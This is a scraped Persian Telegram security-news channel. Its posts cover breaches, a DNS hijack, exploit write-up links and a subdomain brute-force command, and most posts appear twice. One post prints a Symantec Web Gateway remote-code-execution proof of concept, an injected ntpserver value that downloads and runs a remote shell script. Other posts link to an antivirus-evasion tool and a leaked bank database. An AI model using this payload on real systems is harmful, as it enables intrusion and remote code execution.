هکرها با نفوذ به حساب یکی از کارکنان شرکت هاستینگ Godaddy با استفاده از روش spearphishing موفق شدند حمله ی DNS hijacking را بر روی برخی دامنه های تحت کنترل این شرکت اجرا کنند.
یکی از معروف ترین دامنه های هایجک شده دامنه ی Escrow.com است که یک سرویس آنلاین واسط تجاری است.
دی ان اس سرور جایگزین شده در کشور مالزی قرار دارد.
https://www.hackread.com/hackers-deface-escrow-com-hacking-godaddy-employees/
#news
#godaddy
@sec_nerd
یکی از معروف ترین دامنه های هایجک شده دامنه ی Escrow.com است که یک سرویس آنلاین واسط تجاری است.
دی ان اس سرور جایگزین شده در کشور مالزی قرار دارد.
https://www.hackread.com/hackers-deface-escrow-com-hacking-godaddy-employees/
#news
#godaddy
@sec_nerd
دور زدن محدودیت های نوین در حملات XSS با استفاده از روش های code-reuse
https://blog.truesec.com/2020/04/03/bypassing-modern-xss-mitigations-with-code-reuse-attacks/
#xss
#bugbounty
@sec_nerd
https://blog.truesec.com/2020/04/03/bypassing-modern-xss-mitigations-with-code-reuse-attacks/
#xss
#bugbounty
@sec_nerd
هکرها اطلاعات ۶۰۰ هزار کاربر سرویس ایمیل ایتالیایی email.it را در دارک نت به فروش گذاشتند.
این هکرها در وبسایت خود اعلام کردند که از دو سال قبل در سرورهای این سرویس ایتالیایی حضور داشته اند و تمامی اطلاعات ممکن را از آن دزدیده اند.
آنها همچنین میگویند که به ازای مقدار کمی از پول حاضر بوده اند که مشکلات امنیتی را به email.it بگویند اما ایتالیایی ها قبول نکرده و حتی این لو رفتن اطلاعات را به کاربران خود نیز اعلام نکردند.
در حال حاضر این حجم از دیتا که حاوی پسوردهای هش نشده ی کاربران نیز هست در پکیج های مختلف با مبالغی بین نیم الی سه بیت کوین به فروش میرسد.
https://www.zdnet.com/article/email-provider-got-hacked-data-of-600000-users-now-sold-on-the-dark-web/
#breach
#italy
@sec_nerd
این هکرها در وبسایت خود اعلام کردند که از دو سال قبل در سرورهای این سرویس ایتالیایی حضور داشته اند و تمامی اطلاعات ممکن را از آن دزدیده اند.
آنها همچنین میگویند که به ازای مقدار کمی از پول حاضر بوده اند که مشکلات امنیتی را به email.it بگویند اما ایتالیایی ها قبول نکرده و حتی این لو رفتن اطلاعات را به کاربران خود نیز اعلام نکردند.
در حال حاضر این حجم از دیتا که حاوی پسوردهای هش نشده ی کاربران نیز هست در پکیج های مختلف با مبالغی بین نیم الی سه بیت کوین به فروش میرسد.
https://www.zdnet.com/article/email-provider-got-hacked-data-of-600000-users-now-sold-on-the-dark-web/
#breach
#italy
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2020-10199
Nexus Repository Manager 3 RCE
https://mp.weixin.qq.com/s/0dvhRwVCSwu1U6TbK4YvaQ
#rce
#java
@sec_nerd
Nexus Repository Manager 3 RCE
https://mp.weixin.qq.com/s/0dvhRwVCSwu1U6TbK4YvaQ
#rce
#java
@sec_nerd
Brute subs with gobuster:
gobuster dns -r 8.8.8.8 --wildcard -d $DOMAIN -t 50 -c -i -w subdomains-top1million-20000.txt -z -q > tmp.txt && cat tmp.txt | cut -d' ' -f2 | sort -u > subs.txt && cat tmp.txt | cut -d' ' -f3 | tr -d '[]' | sort -u -V > hosts.txt
#bugbounty
#subdomain
#pentest
@sec_nerd
gobuster dns -r 8.8.8.8 --wildcard -d $DOMAIN -t 50 -c -i -w subdomains-top1million-20000.txt -z -q > tmp.txt && cat tmp.txt | cut -d' ' -f2 | sort -u > subs.txt && cat tmp.txt | cut -d' ' -f3 | tr -d '[]' | sort -u -V > hosts.txt
#bugbounty
#subdomain
#pentest
@sec_nerd
سرویس ابری cloudflare اعلام کرد ساپورت خود را از recaptcha متوقف و از hcaptcha استفاده خواهد کرد.
این تصمیم بخاطر این گرفته شده است که گوگل قصد دارد بابت استفاده از این سرویس هزینه دریافت کند.
این هزینه به ناچار به کاربران کلودفلر تحمیل خواهد شد بنابراین این شرکت از سرویس دیگری استفاده خواهد کرد.
دو مشکل عمده ی ریکپچا از زبان پرینس مدیرعامل کلودفلر این است که در کشورهایی مثل چین که ریکپچا در آن فیلتر شده است قابل استفاده نیست و سرویس دهی به چینی ها برای کلودفلر مشکل است و دیگر سیاست های گوگل برای جمع آوری اطلاعات کاربران است که در این مورد hcaptcha اطلاعات بسیار کمتری را از کاربران جمع آوری میکند.
https://www.zdnet.com/article/cloudflare-dumps-recaptcha-as-google-intends-to-charge-for-its-use/
#news
#cloudflare
#google
#recaptcha
@sec_nerd
این تصمیم بخاطر این گرفته شده است که گوگل قصد دارد بابت استفاده از این سرویس هزینه دریافت کند.
این هزینه به ناچار به کاربران کلودفلر تحمیل خواهد شد بنابراین این شرکت از سرویس دیگری استفاده خواهد کرد.
دو مشکل عمده ی ریکپچا از زبان پرینس مدیرعامل کلودفلر این است که در کشورهایی مثل چین که ریکپچا در آن فیلتر شده است قابل استفاده نیست و سرویس دهی به چینی ها برای کلودفلر مشکل است و دیگر سیاست های گوگل برای جمع آوری اطلاعات کاربران است که در این مورد hcaptcha اطلاعات بسیار کمتری را از کاربران جمع آوری میکند.
https://www.zdnet.com/article/cloudflare-dumps-recaptcha-as-google-intends-to-charge-for-its-use/
#news
#cloudflare
#recaptcha
@sec_nerd
Hcaptcha
hCaptcha - Stop bots and human abuse.
Enterprise grade AI security platform with a privacy focus. Replace reCAPTCHA v2, v3, or Enterprise with next generation tech at better value. Used by millions.
امنیت اطلاعات
سرویس کنفرانس ویدیویی Zoom که اکنون توسط میلیونها امریکایی در بخش های تحصیلی، درمانی و ارتباطات اجتماعی مورد استفاده قرار میگیرد دچار یک آسیب پذیری بحرانی است. کلاینت ویندوزی زوم به هکرها اجازه ی اجرای دستور از راه دور بر روی سیستم و دستیابی به منابع شبکه…
استفاده از سرویس کنفرانس zoom روز به روز در حال افزایش است به طوری که شرک کنندگان روزانه ی کنفرانس ها در این سرویس از ۲۰۰ میلیون هم گذشته است.
با افزایش شهرت زوم هکرها نیز به سراغ این سرویس رفته اند و موفق به هک کردن حساب بیش از ۳۵۰ اکانت وریفای شده ی زوم شدند.
این تعداد اکانت در دارک وب به فروش میرسد و در آن یک حساب متعلق به سرویس بهداشتی ایالات متحده نیز دیده میشود.
https://www.hackread.com/zoom-accounts-login-details-dark-web/
#breach
#zoom
@sec_nerd
با افزایش شهرت زوم هکرها نیز به سراغ این سرویس رفته اند و موفق به هک کردن حساب بیش از ۳۵۰ اکانت وریفای شده ی زوم شدند.
این تعداد اکانت در دارک وب به فروش میرسد و در آن یک حساب متعلق به سرویس بهداشتی ایالات متحده نیز دیده میشود.
https://www.hackread.com/zoom-accounts-login-details-dark-web/
#breach
#zoom
@sec_nerd
آسیب پذیری اجرای دستور از راه دور در سرویس Symantec Web Gateway نسخه ی 5.0.2.8
[PoC]
POST /spywall/timeConfig.php HTTP/1.1
posttime=1585228657&saveForm=Save×ync=1&ntpserver=https://qweqwe.com;$(wget%20https://192.168.1.
170/a.sh%20-O%20/tmp/a.sh;sh%20/tmp/a.sh);#&timezone=5
https://packetstormsecurity.com/files/157163/Symantec-Web-Gateway-5.0.2.8-Remote-Code-Execution.html
#symantec
#exploit
#rce
@sec_nerd
[PoC]
POST /spywall/timeConfig.php HTTP/1.1
posttime=1585228657&saveForm=Save×ync=1&ntpserver=https://qweqwe.com;$(wget%20https://192.168.1.
170/a.sh%20-O%20/tmp/a.sh;sh%20/tmp/a.sh);#&timezone=5
https://packetstormsecurity.com/files/157163/Symantec-Web-Gateway-5.0.2.8-Remote-Code-Execution.html
#symantec
#exploit
#rce
@sec_nerd
Forwarded from Information Security
xencrypt
اسکریپت پاورشل برای دور زدن آنتی ویروس ها
https://hakin9.org/xencrypt-a-powershell-script-anti-virus-evasion-tool/
#windows
#ps
#bypass
@sec_nerd
اسکریپت پاورشل برای دور زدن آنتی ویروس ها
https://hakin9.org/xencrypt-a-powershell-script-anti-virus-evasion-tool/
#windows
#ps
#bypass
@sec_nerd
بانک ملی افغانستان هم هک شد
دیتابیس این بانک که حجم بسیار اندکی دارد بصورت رایگان در raidforums قرار گرفت
https://raidforums.com/Thread-Bank-Meli-Afghan-Full-Database-bma-com-af
#breach
#afghanistan
@sec_nerd
دیتابیس این بانک که حجم بسیار اندکی دارد بصورت رایگان در raidforums قرار گرفت
https://raidforums.com/Thread-Bank-Meli-Afghan-Full-Database-bma-com-af
#breach
#afghanistan
@sec_nerd
امنیت اطلاعات
استفاده از سرویس کنفرانس zoom روز به روز در حال افزایش است به طوری که شرک کنندگان روزانه ی کنفرانس ها در این سرویس از ۲۰۰ میلیون هم گذشته است. با افزایش شهرت زوم هکرها نیز به سراغ این سرویس رفته اند و موفق به هک کردن حساب بیش از ۳۵۰ اکانت وریفای شده ی زوم…
رایت آپی در خصوص نحوه ی نفوذ به حسابهای zoom
https://medium.com/@s3c/how-i-hacked-worldwide-zoom-users-eafdff94077d
#zoom
#writeup
@sec_nerd
https://medium.com/@s3c/how-i-hacked-worldwide-zoom-users-eafdff94077d
#zoom
#writeup
@sec_nerd
مجموعه رایت آپهای مرتبط با آسیب پذیری SSRF
medium.com/a-bugz-life/exploiting-an-ssrf-trials-and-tribulations-14c5d8dbd69a
https://medium.com/@michan001/ssrf-on-pdf-generator-36b81e16d67b
https://ngailong.wordpress.com/2019/12/19/google-vrp-ssrf-in-google-cloud-platform-stackdriver/
https://medium.com/@dPhoeniixx/vimeo-upload-function-ssrf-7466d8630437
https://medium.com/@pflash0x0punk/ssrf-via-ffmpeg-hls-processing-a04e0288a8c5
https://kntx.xyz/Blind-SSRF-due-to-Sentry-Misconfiguration/
https://jin0ne.blogspot.com/2019/11/bugbounty-simple-ssrf.html
https://openbugbounty.org/blog/leonmugen/ssrf-reading-local-files-from-downnotifier-server/
https://evanricafort.blogspot.com/2019/08/ssrf-vulnerability-in.html
https://medium.com/@androgaming1912/gain-adfly-smtp-access-with-ssrf-via-gopher-protocol-26a26d0ec2cb
#ssrf
#writeup
#bugbounty
#web
#pentest
@sec_nerd
medium.com/a-bugz-life/exploiting-an-ssrf-trials-and-tribulations-14c5d8dbd69a
https://medium.com/@michan001/ssrf-on-pdf-generator-36b81e16d67b
https://ngailong.wordpress.com/2019/12/19/google-vrp-ssrf-in-google-cloud-platform-stackdriver/
https://medium.com/@dPhoeniixx/vimeo-upload-function-ssrf-7466d8630437
https://medium.com/@pflash0x0punk/ssrf-via-ffmpeg-hls-processing-a04e0288a8c5
https://kntx.xyz/Blind-SSRF-due-to-Sentry-Misconfiguration/
https://jin0ne.blogspot.com/2019/11/bugbounty-simple-ssrf.html
https://openbugbounty.org/blog/leonmugen/ssrf-reading-local-files-from-downnotifier-server/
https://evanricafort.blogspot.com/2019/08/ssrf-vulnerability-in.html
https://medium.com/@androgaming1912/gain-adfly-smtp-access-with-ssrf-via-gopher-protocol-26a26d0ec2cb
#ssrf
#writeup
#bugbounty
#web
#pentest
@sec_nerd
Medium
Exploiting an SSRF: Trials and Tribulations
I mostly wanted to share this post not because it’s a novel and unique attack, but to show the thought process of attacking this…
تلفیق سه آسیب پذیری برای بدست آوردن RCE در Microsoft AttackSurfaceAnalyzer
https://parsiya.net/blog/2019-06-18-chaining-three-bugs-to-get-rce-in-microsoft-attacksurfaceanalyzer/
#windows
#privesc
@sec_nerd
https://parsiya.net/blog/2019-06-18-chaining-three-bugs-to-get-rce-in-microsoft-attacksurfaceanalyzer/
#windows
#privesc
@sec_nerd
تکنیک های معمول در حملات XXE و SSRF
تست کیس های این دو حمله:
https://blog.aisecureme.com/application-security-test-cases-for-xxe-ssrf/
#xxe
#ssrf
@sec_nerd
تست کیس های این دو حمله:
https://blog.aisecureme.com/application-security-test-cases-for-xxe-ssrf/
#xxe
#ssrf
@sec_nerd